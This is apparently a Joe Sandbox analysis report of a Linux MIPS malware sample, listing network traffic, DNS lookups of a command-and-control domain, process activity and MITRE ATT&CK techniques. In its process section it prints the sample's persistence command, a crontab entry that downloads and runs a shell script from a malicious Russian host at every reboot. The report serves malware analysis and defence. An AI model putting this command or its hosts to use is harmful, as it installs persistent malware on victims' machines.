Dec 17, 2024 21:43:44.600680113 CET	58098	5169	192.168.2.23	80.78.26.121
Dec 17, 2024 21:43:45.824702978 CET	43928	443	192.168.2.23	91.189.91.42
Dec 17, 2024 21:43:49.845777988 CET	59372	18670	192.168.2.23	80.78.26.121
Dec 17, 2024 21:43:49.966504097 CET	18670	59372	80.78.26.121	192.168.2.23
Dec 17, 2024 21:43:49.966614962 CET	59372	18670	192.168.2.23	80.78.26.121
Dec 17, 2024 21:43:49.966780901 CET	59372	18670	192.168.2.23	80.78.26.121
Dec 17, 2024 21:43:50.086348057 CET	18670	59372	80.78.26.121	192.168.2.23
Dec 17, 2024 21:43:50.086481094 CET	59372	18670	192.168.2.23	80.78.26.121
Dec 17, 2024 21:43:50.206093073 CET	18670	59372	80.78.26.121	192.168.2.23
Dec 17, 2024 21:43:51.270242929 CET	18670	59372	80.78.26.121	192.168.2.23
Dec 17, 2024 21:43:51.270648003 CET	59372	18670	192.168.2.23	80.78.26.121
Dec 17, 2024 21:43:51.270648003 CET	59372	18670	192.168.2.23	80.78.26.121
Dec 17, 2024 21:43:56.521380901 CET	45406	9421	192.168.2.23	80.78.26.121
Dec 17, 2024 21:43:56.641587973 CET	9421	45406	80.78.26.121	192.168.2.23
Dec 17, 2024 21:43:56.641949892 CET	45406	9421	192.168.2.23	80.78.26.121
Dec 17, 2024 21:43:56.641949892 CET	45406	9421	192.168.2.23	80.78.26.121
Dec 17, 2024 21:43:56.762254000 CET	9421	45406	80.78.26.121	192.168.2.23
Dec 17, 2024 21:43:56.762572050 CET	45406	9421	192.168.2.23	80.78.26.121
Dec 17, 2024 21:43:56.884433031 CET	9421	45406	80.78.26.121	192.168.2.23
Dec 17, 2024 21:44:06.650693893 CET	45406	9421	192.168.2.23	80.78.26.121
Dec 17, 2024 21:44:06.770637989 CET	9421	45406	80.78.26.121	192.168.2.23
Dec 17, 2024 21:44:15.862318039 CET	57590	9153	192.168.2.23	80.78.26.121
Dec 17, 2024 21:44:15.982131004 CET	9153	57590	80.78.26.121	192.168.2.23
Dec 17, 2024 21:44:16.286825895 CET	9153	57590	80.78.26.121	192.168.2.23
Dec 17, 2024 21:44:16.287221909 CET	57590	9153	192.168.2.23	80.78.26.121
Dec 17, 2024 21:44:18.569441080 CET	9421	45406	80.78.26.121	192.168.2.23
Dec 17, 2024 21:44:18.570000887 CET	45406	9421	192.168.2.23	80.78.26.121
Dec 17, 2024 21:44:18.689719915 CET	9421	45406	80.78.26.121	192.168.2.23
Dec 17, 2024 21:44:43.601696014 CET	45408	9421	192.168.2.23	80.78.26.121
Dec 17, 2024 21:44:43.721498966 CET	9421	45408	80.78.26.121	192.168.2.23
Dec 17, 2024 21:44:43.721889973 CET	45408	9421	192.168.2.23	80.78.26.121
Dec 17, 2024 21:44:43.721959114 CET	45408	9421	192.168.2.23	80.78.26.121
Dec 17, 2024 21:44:43.842065096 CET	9421	45408	80.78.26.121	192.168.2.23
Dec 17, 2024 21:44:43.842340946 CET	45408	9421	192.168.2.23	80.78.26.121
Dec 17, 2024 21:44:43.962177038 CET	9421	45408	80.78.26.121	192.168.2.23

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 21:42:45.026065111 CET	54608	53	192.168.2.23	51.158.108.203
Dec 17, 2024 21:42:45.142328978 CET	37888	53	192.168.2.23	51.158.108.203
Dec 17, 2024 21:42:45.267050982 CET	53	54608	51.158.108.203	192.168.2.23
Dec 17, 2024 21:42:45.380973101 CET	53	37888	51.158.108.203	192.168.2.23
Dec 17, 2024 21:42:52.066519976 CET	45990	53	192.168.2.23	168.235.111.72
Dec 17, 2024 21:42:52.384733915 CET	53	45990	168.235.111.72	192.168.2.23
Dec 17, 2024 21:42:59.848325968 CET	52531	53	192.168.2.23	152.53.15.127
Dec 17, 2024 21:43:00.089138031 CET	53	52531	152.53.15.127	192.168.2.23
Dec 17, 2024 21:43:07.520653009 CET	42922	53	192.168.2.23	80.152.203.134
Dec 17, 2024 21:43:12.528040886 CET	56781	53	192.168.2.23	202.61.197.122
Dec 17, 2024 21:43:12.769339085 CET	53	56781	202.61.197.122	192.168.2.23
Dec 17, 2024 21:43:20.208199978 CET	38735	53	192.168.2.23	80.152.203.134
Dec 17, 2024 21:43:25.214643002 CET	38380	53	192.168.2.23	139.84.165.176
Dec 17, 2024 21:43:30.221383095 CET	47743	53	192.168.2.23	139.84.165.176
Dec 17, 2024 21:43:35.228753090 CET	38041	53	192.168.2.23	51.158.108.203
Dec 17, 2024 21:43:35.468153954 CET	53	38041	51.158.108.203	192.168.2.23
Dec 17, 2024 21:43:42.911432981 CET	33996	53	192.168.2.23	217.160.70.42
Dec 17, 2024 21:43:43.150219917 CET	53	33996	217.160.70.42	192.168.2.23
Dec 17, 2024 21:43:49.605736971 CET	52244	53	192.168.2.23	217.160.70.42
Dec 17, 2024 21:43:49.844398022 CET	53	52244	217.160.70.42	192.168.2.23
Dec 17, 2024 21:43:56.273499966 CET	35073	53	192.168.2.23	194.36.144.87
Dec 17, 2024 21:43:56.519875050 CET	53	35073	194.36.144.87	192.168.2.23
Dec 17, 2024 21:44:23.574338913 CET	43744	53	192.168.2.23	178.254.22.166
Dec 17, 2024 21:44:28.580719948 CET	42465	53	192.168.2.23	137.220.52.23
Dec 17, 2024 21:44:33.588435888 CET	44857	53	192.168.2.23	137.220.52.23
Dec 17, 2024 21:44:38.594789028 CET	35506	53	192.168.2.23	70.34.254.19

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 17, 2024 21:42:45.026065111 CET	192.168.2.23	51.158.108.203	0x156	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:42:45.142328978 CET	192.168.2.23	51.158.108.203	0x156	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:42:52.066519976 CET	192.168.2.23	168.235.111.72	0xfc39	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:42:59.848325968 CET	192.168.2.23	152.53.15.127	0x3b	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:07.520653009 CET	192.168.2.23	80.152.203.134	0x6eb7	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:12.528040886 CET	192.168.2.23	202.61.197.122	0x8e59	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:20.208199978 CET	192.168.2.23	80.152.203.134	0x248c	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:25.214643002 CET	192.168.2.23	139.84.165.176	0xa110	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:30.221383095 CET	192.168.2.23	139.84.165.176	0x8806	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:35.228753090 CET	192.168.2.23	51.158.108.203	0x373e	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:42.911432981 CET	192.168.2.23	217.160.70.42	0xc2ab	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:49.605736971 CET	192.168.2.23	217.160.70.42	0x4f70	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:56.273499966 CET	192.168.2.23	194.36.144.87	0x9fb5	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:44:23.574338913 CET	192.168.2.23	178.254.22.166	0xcdaf	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:44:28.580719948 CET	192.168.2.23	137.220.52.23	0x7311	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:44:33.588435888 CET	192.168.2.23	137.220.52.23	0x6f69	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:44:38.594789028 CET	192.168.2.23	70.34.254.19	0x3f91	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 17, 2024 21:42:45.267050982 CET	51.158.108.203	192.168.2.23	0x156	No error (0)	kingstonwikkerink.dyn	212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:42:45.267050982 CET	51.158.108.203	192.168.2.23	0x156	No error (0)	kingstonwikkerink.dyn	80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:42:45.380973101 CET	51.158.108.203	192.168.2.23	0x156	No error (0)	kingstonwikkerink.dyn	212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:42:45.380973101 CET	51.158.108.203	192.168.2.23	0x156	No error (0)	kingstonwikkerink.dyn	80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:42:52.384733915 CET	168.235.111.72	192.168.2.23	0xfc39	No error (0)	kingstonwikkerink.dyn	80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:42:52.384733915 CET	168.235.111.72	192.168.2.23	0xfc39	No error (0)	kingstonwikkerink.dyn	212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:00.089138031 CET	152.53.15.127	192.168.2.23	0x3b	No error (0)	kingstonwikkerink.dyn	80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:00.089138031 CET	152.53.15.127	192.168.2.23	0x3b	No error (0)	kingstonwikkerink.dyn	212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:12.769339085 CET	202.61.197.122	192.168.2.23	0x8e59	No error (0)	kingstonwikkerink.dyn	80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:12.769339085 CET	202.61.197.122	192.168.2.23	0x8e59	No error (0)	kingstonwikkerink.dyn	212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:35.468153954 CET	51.158.108.203	192.168.2.23	0x373e	No error (0)	kingstonwikkerink.dyn	212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:35.468153954 CET	51.158.108.203	192.168.2.23	0x373e	No error (0)	kingstonwikkerink.dyn	80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:43.150219917 CET	217.160.70.42	192.168.2.23	0xc2ab	No error (0)	kingstonwikkerink.dyn	80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:43.150219917 CET	217.160.70.42	192.168.2.23	0xc2ab	No error (0)	kingstonwikkerink.dyn	212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:49.844398022 CET	217.160.70.42	192.168.2.23	0x4f70	No error (0)	kingstonwikkerink.dyn	80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:49.844398022 CET	217.160.70.42	192.168.2.23	0x4f70	No error (0)	kingstonwikkerink.dyn	212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:56.519875050 CET	194.36.144.87	192.168.2.23	0x9fb5	No error (0)	kingstonwikkerink.dyn	80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 17, 2024 21:43:56.519875050 CET	194.36.144.87	192.168.2.23	0x9fb5	No error (0)	kingstonwikkerink.dyn	212.64.215.71	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: dash PID: 6188, Parent PID: 4331

General

Start time (UTC):	20:42:34
Start date (UTC):	17/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 6188, Parent PID: 4331

General

Start time (UTC):	20:42:34
Start date (UTC):	17/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.24FY65F9IU /tmp/tmp.dFfaOL50Ud /tmp/tmp.PCCj74KoGG
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: dash PID: 6189, Parent PID: 4331

General

Start time (UTC):	20:42:34
Start date (UTC):	17/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 6189, Parent PID: 4331

General

Start time (UTC):	20:42:34
Start date (UTC):	17/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.24FY65F9IU /tmp/tmp.dFfaOL50Ud /tmp/tmp.PCCj74KoGG
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: nshkmips.elf PID: 6208, Parent PID: 6124

General

Start time (UTC):	20:42:43
Start date (UTC):	17/12/2024
Path:	/tmp/nshkmips.elf
Arguments:	/tmp/nshkmips.elf
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Chronological Activities

Analysis Process: nshkmips.elf PID: 6210, Parent PID: 6208

General

Start time (UTC):	20:42:44
Start date (UTC):	17/12/2024
Path:	/tmp/nshkmips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Chronological Activities

Analysis Process: sh PID: 6210, Parent PID: 6208

General

Start time (UTC):	20:42:44
Start date (UTC):	17/12/2024
Path:	/bin/sh
Arguments:	sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6216, Parent PID: 6210

General

Start time (UTC):	20:42:44
Start date (UTC):	17/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6218, Parent PID: 6216

General

Start time (UTC):	20:42:44
Start date (UTC):	17/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 6218, Parent PID: 6216

General

Start time (UTC):	20:42:44
Start date (UTC):	17/12/2024
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 6217, Parent PID: 6210

General

Start time (UTC):	20:42:44
Start date (UTC):	17/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 6217, Parent PID: 6210

General

Start time (UTC):	20:42:44
Start date (UTC):	17/12/2024
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: nshkmips.elf PID: 6219, Parent PID: 6208

General

Start time (UTC):	20:42:44
Start date (UTC):	17/12/2024
Path:	/tmp/nshkmips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Chronological Activities

Analysis Process: nshkmips.elf PID: 6262, Parent PID: 6219

General

Start time (UTC):	20:42:44
Start date (UTC):	17/12/2024
Path:	/tmp/nshkmips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Chronological Activities

Analysis Process: nshkmips.elf PID: 6220, Parent PID: 6208

General

Start time (UTC):	20:42:44
Start date (UTC):	17/12/2024
Path:	/tmp/nshkmips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report nshkmips.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/var/spool/cron/crontabs/tmp.yuaIDk

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: dash PID: 6188, Parent PID: 4331

General

Chronological Activities

Analysis Process: rm PID: 6188, Parent PID: 4331

General

Chronological Activities

Analysis Process: dash PID: 6189, Parent PID: 4331

General

Chronological Activities

Analysis Process: rm PID: 6189, Parent PID: 4331

General

Chronological Activities

Analysis Process: nshkmips.elf PID: 6208, Parent PID: 6124

General

Chronological Activities

Analysis Process: nshkmips.elf PID: 6210, Parent PID: 6208

General

Chronological Activities

Linux Analysis Report
nshkmips.elf